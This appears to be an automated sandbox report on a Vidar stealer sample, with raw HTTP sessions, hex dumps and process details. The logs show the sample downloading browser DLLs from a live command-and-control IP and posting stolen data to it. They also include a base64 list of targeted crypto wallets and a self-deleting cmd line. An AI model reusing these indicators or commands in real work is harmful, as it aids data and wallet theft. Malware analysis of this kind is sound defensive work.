Destination IP: 49.12.106.214
Destination Port: 443
PID: 1396
Process: C:\Users\user\Desktop\out.exe

Timestamp: 2024-10-07 18:35:37 UTC
Bytes transferred: 197
Direction: OUT
Data:
GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-10-07 18:35:38 UTC
Bytes transferred: 260
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:38 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Monday, 07-Oct-2024 18:35:38 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID: 13
Source IP: 192.168.2.5
Source Port: 49887
Destination IP: 49.12.106.214
Destination Port: 443
PID: 1396
Process: C:\Users\user\Desktop\out.exe

Timestamp: 2024-10-07 18:35:39 UTC
Bytes transferred: 198
Direction: OUT
Data:
GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-10-07 18:35:39 UTC
Bytes transferred: 260
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:39 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Monday, 07-Oct-2024 18:35:39 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                        Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                                                                                                                                        Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                                                                                                                                        Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                                                                                                                                        Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                                                                                                                                        2024-10-07 18:35:40 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                                                                                                                                        Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                                                                                                                                        2024-10-07 18:35:40 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                                                                                                                                        Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49899 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:41 UTC | 198 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:41 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:41 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Monday, 07-Oct-2024 18:35:41 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49913 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:43 UTC | 202 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:43 UTC | 259 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:43 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Monday, 07-Oct-2024 18:35:43 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                        Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.5  49924        49.12.106.214   443               1396  C:\Users\user\Desktop\out.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-07 18:35:44 UTC  194                OUT        GET /nss3.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:45 UTC  261                IN         HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:44 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 2046288
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:44 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.5  49946        49.12.106.214   443               1396  C:\Users\user\Desktop\out.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-07 18:35:47 UTC  279                OUT        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 1145
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:47 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------BKJEGDGIJECGCBGCGHDGCont
2024-10-07 18:35:48 UTC  158                IN         HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:48 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.5  49953        49.12.106.214   443               1396  C:\Users\user\Desktop\out.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-07 18:35:49 UTC  278                OUT        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------IIEBGIDAAFHIJJJJEGCGCont
2024-10-07 18:35:50 UTC  158                IN         HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:50 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.5  49963        49.12.106.214   443               1396  C:\Users\user\Desktop\out.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-07 18:35:50 UTC  278                OUT        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
2024-10-07 18:35:50 UTC | 331 | OUT | Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HDHJEBFBFHJECAKFCAAKCont
2024-10-07 18:35:51 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:51 UTC | 1524 | IN | Data: [base64-encoded response body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49974 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:52 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:52 UTC | 461 | OUT | Data Ascii: ------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------DBKEGCAEGIIJKFIEHIJECont
2024-10-07 18:35:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49988 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:54 UTC | 281 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 114269
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:54 UTC | 16355 | OUT | Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------CBGCAFIIECBFIDHIJKFBCont
2024-10-07 18:35:54 UTC | 16355 | OUT | Data: [base64-encoded request body, continued]
2024-10-07 18:35:54 UTC | 16355 | OUT | Data: [base64-encoded request body, continued]
2024-10-07 18:35:54 UTC | 16355 | OUT | Data: [base64-encoded request body, continued]
2024-10-07 18:35:54 UTC | 16355 | OUT | Data: [base64-encoded request body, continued]
2024-10-07 18:35:54 UTC | 16355 | OUT | Data: [base64-encoded request body, continued]
2024-10-07 18:35:54 UTC | 16139 | OUT | Data: [base64-encoded request body, continued]
2024-10-07 18:35:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49998 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:56 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:56 UTC | 331 | OUT | Data Ascii: ------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------GIEGHJEGHJKFIEBFHJKKCont
2024-10-07 18:35:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Oct 2024 18:35:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-07 18:35:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49999 | 49.12.106.214 | 443 | 1396 | C:\Users\user\Desktop\out.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 18:35:57 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-07 18:35:57 UTC | 331 | OUT | Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------CGHDAKKJJJKJKECBGCGDCont
2024-10-07 18:35:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:58 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
2024-10-07 18:35:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:14:34:55
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\out.exe"
                                                                                                                                                                                        Imagebase:0x20000
                                                                                                                                                                                        File size:393'216 bytes
                                                                                                                                                                                        MD5 hash:7A2F8827805ABA605AC201A9F0C2CB03
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:14:35:58
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit
                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:14:35:58
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:14:35:58
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:timeout /t 10
